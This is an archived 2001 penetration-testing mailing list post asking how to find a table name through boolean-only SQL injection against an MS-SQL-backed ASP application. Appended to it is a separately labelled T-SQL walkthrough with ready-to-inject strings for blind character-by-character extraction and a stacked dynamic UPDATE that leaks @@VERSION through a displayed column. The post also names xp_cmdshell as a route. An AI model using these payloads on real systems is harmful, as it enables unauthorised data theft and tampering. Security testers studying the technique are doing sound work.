Penetration Testing mailing list archives

sql insertion


From: H D Moore <hdm () secureaustin com>
Date: Sat, 26 May 2001 16:02:07 -0500

I have a buggy web application which takes an input field and places it in 
the middle of an SQL query, then executes it against a MS-SQL server. I can 
rewrite the query because single quotes are used to encapsulate the input 
field, and the script doesn't strip out the single quote character. 

I pieced together most of the original SQL by viewing the ODBC error messages 
the IIS server spits out when I mangle the query:

SELECT ? FROM ? WHERE KnownColumnName = '%input%'

The backend SQL server is behind heavy incoming and outgoing packet filters, 
so just using xp_cmdshell, xp_sendmail, or sp_makewebtask won't cut it. 
There is however an interface on the web site which displays certain fields 
from the same table which the above query selects from. If I take the output 
of one query and insert it into the field of this table, I could 
theoretically view the results by browsing this web interface. The problem 
is that I don't know the name of the table that my query is working on, so I 
can't run an update or insert query until I figure that out. I went through a 
massive number of common table names without much luck, so does anyone know 
of a method to determine the name of the table? Keep in mind that I can't 
actually view the results of any query, because the ASP script is treating 
the return value as a boolean. Is there a way to select the object ID of a 
known column name from the syscolumns metatable, pass that object ID into 
another subselect against the sysobjects metatable to get the table name, and 
finally use that table as part of a final query?

-HD
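The column-to-table resolution asked about above, worked through as an added T-SQL example (this is not part of the original post and not code from its author). It goes one step beyond the question: because only a true/false result is observable through the ASP page, it also shows how to infer the resolved name one character at a time through the boolean, and how to write query output into a displayed column once the name is known. KnownColumnName comes from the post; the table accounts, the column Notes, the sample row and the injected input strings are assumptions constructed for the example.

```sql
-- Added example, not from the original post. Assumed names: accounts, Notes.
-- Constructed schema so the script runs stand-alone in a scratch database.
CREATE TABLE accounts (
    KnownColumnName varchar(50),    -- the column the application filters on
    Notes           varchar(1000)   -- assumed: a column the web interface displays
);
INSERT INTO accounts VALUES ('alice', 'first row');
GO

-- 1. Known column -> owning object id -> table name.
--    syscolumns.id is the object id of the table that owns the column;
--    sysobjects.xtype = 'U' restricts the match to user tables.
--    Caveat: if several tables share the column name, TOP 1 without an
--    ORDER BY returns an arbitrary one of them.
SELECT o.name
FROM sysobjects o
WHERE o.xtype = 'U'
  AND o.id = (SELECT TOP 1 c.id FROM syscolumns c WHERE c.name = 'KnownColumnName');
GO

-- 2. Only a boolean is observable, so infer the name one character at a time.
--    Injected into  SELECT ? FROM ? WHERE KnownColumnName = '<input>'  as the input
--      x' OR (SELECT TOP 1 ASCII(SUBSTRING(o.name, 1, 1)) FROM sysobjects o
--             WHERE o.xtype = 'U' AND o.id = (SELECT TOP 1 c.id FROM syscolumns c
--             WHERE c.name = 'KnownColumnName')) > 97 --
--    the query returns rows (page says "true") only when the comparison holds;
--    the trailing -- swallows the closing quote the script appends. Varying the
--    position and the comparison value (binary search over 0..127) recovers
--    every character. The standalone form of that test:
SELECT CASE WHEN (
    SELECT TOP 1 ASCII(SUBSTRING(o.name, 1, 1))
    FROM sysobjects o
    WHERE o.xtype = 'U'
      AND o.id = (SELECT TOP 1 c.id FROM syscolumns c WHERE c.name = 'KnownColumnName')
) > 97 THEN 1 ELSE 0 END AS first_char_gt_a;   -- 'a' is 97, so 0 for 'accounts'
GO

-- 3. Use the resolved table in a final query. A table name cannot come from a
--    subquery in UPDATE, so the statement is assembled as dynamic SQL; the same
--    batch can be injected as  x'; DECLARE ... EXEC(...) --  since MS-SQL runs
--    stacked statements. Here the server version string is written into the
--    displayed column so the web interface leaks it.
DECLARE @t sysname;
SELECT @t = o.name
FROM sysobjects o
JOIN syscolumns c ON c.id = o.id
WHERE c.name = 'KnownColumnName' AND o.xtype = 'U';
EXEC('UPDATE ' + @t + ' SET Notes = @@VERSION');
GO

SELECT Notes FROM accounts;   -- now holds the @@VERSION string instead of 'first row'
```

syscolumns and sysobjects are the SQL Server 2000 system tables the post refers to; later versions keep them as compatibility views alongside the sys.columns and sys.objects catalog views, so the same joins still work. The dynamic UPDATE in step 3 rewrites every row of the table, which is fine for a demonstration but is exactly the kind of side effect to agree on before running it against a client's data.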




